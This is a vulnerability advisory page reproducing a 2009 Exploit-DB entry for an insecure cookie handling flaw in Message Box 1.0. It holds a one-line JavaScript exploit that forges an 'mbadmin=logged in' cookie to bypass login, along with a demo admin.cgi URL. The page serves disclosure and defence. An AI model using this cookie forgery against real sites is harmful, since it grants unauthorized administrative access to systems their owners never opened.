Message Box Version 1.0 Insecure Cookie Handling Vulnerability

vendor:

Message Box

by:

TiGeR-Dz

7,5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Message Box

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mrcgiguy:message_box:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Message Box Version 1.0 Insecure Cookie Handling Vulnerability

Message Box Version 1.0 is vulnerable to an insecure cookie handling vulnerability. An attacker can exploit this vulnerability by setting the mbadmin cookie to 'logged in' and accessing the admin.cgi page.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Message Box Version 1.0 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:Message Box Version 1.0
Download:http://www.mrcgiguy.com/message_box.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="mbadmin=logged%20in;path=/";
----------------------------------------------------------------
Dem0
----
http://www.mrcgiguy.com/cgi-bin/messagebox/admin.cgi
--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]